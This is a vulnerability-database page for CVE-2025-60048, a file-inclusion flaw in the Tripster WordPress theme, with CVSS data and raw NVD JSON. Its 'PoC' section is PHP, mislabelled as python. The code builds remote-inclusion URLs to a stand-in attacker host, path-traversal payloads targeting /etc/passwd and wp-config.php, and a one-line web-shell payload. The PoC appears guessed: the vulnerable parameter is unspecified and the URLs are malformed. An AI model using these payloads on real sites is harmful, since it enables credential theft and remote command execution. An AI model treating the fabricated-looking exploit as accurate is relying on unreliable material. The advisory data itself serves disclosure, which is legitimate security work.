Security Vulnerability Report
中文
CVE-2025-60048 CVSS 8.1 HIGH

CVE-2025-60048

Published: 2025-12-18 08:16:04
Last Modified: 2026-04-27 16:16:30

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Tripster tripster allows PHP Local File Inclusion.This issue affects Tripster: from n/a through <= 1.0.10.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:axiomthemes:tripster:*:*:*:*:*:wordpress:*:* - VULNERABLE
Tripster Theme <= 1.0.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php /** * CVE-2025-60048 PoC - Tripster Theme LFI/RFI Exploit * Author: Security Researcher * Note: For educational and authorized testing purposes only */ // Target URL (Tripster theme vulnerable endpoint) $target = 'http://target-site.com/wp-content/themes/tripster/'; // Method 1: Remote File Inclusion (RFI) // Attacker-controlled server hosting malicious PHP file $attacker_server = 'http://attacker-server.com/evil.php'; // Vulnerable parameter (commonly found in theme's PHP files) $vulnerable_param = 'template'; // Construct RFI payload $rfi_payload = $target . '?page=' . urlencode($vulnerable_param) . '=' . urlencode($attacker_server); echo "[*] CVE-2025-60048 Tripster Theme RFI PoC\n"; echo "[*] Target: " . $target . "\n"; echo "[*] Attacker Server: " . $attacker_server . "\n"; echo "[*] Payload URL: " . $rfi_payload . "\n\n"; // Method 2: Local File Inclusion (LFI) for information disclosure $lfi_payloads = [ '../../../../../../etc/passwd', '../../../../../../wp-config.php', '../../../../../../../../var/www/html/wp-config.php' ]; echo "[*] Testing Local File Inclusion:\n"; foreach ($lfi_payloads as $payload) { $lfi_url = $target . '?page=' . urlencode($vulnerable_param) . '=' . urlencode($payload); echo " - " . $lfi_url . "\n"; } echo "\n[*] Send the crafted URL to target server to exploit the vulnerability.\n"; echo "[*] The malicious PHP file should contain: <?php system(\$_GET['cmd']); ?>\n"; ?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60048", "sourceIdentifier": "[email protected]", "published": "2025-12-18T08:16:04.357", "lastModified": "2026-04-27T16:16:30.013", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Tripster tripster allows PHP Local File Inclusion.This issue affects Tripster: from n/a through <= 1.0.10."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:axiomthemes:tripster:*:*:*:*:*:wordpress:*:*", "versionEndIncluding": "1.0.10", "matchCriteriaId": "6B4B938B-8204-46DD-9826-CF5DCE389CCA"}]}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/tripster/vulnerability/wordpress-tripster-theme-1-0-10-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}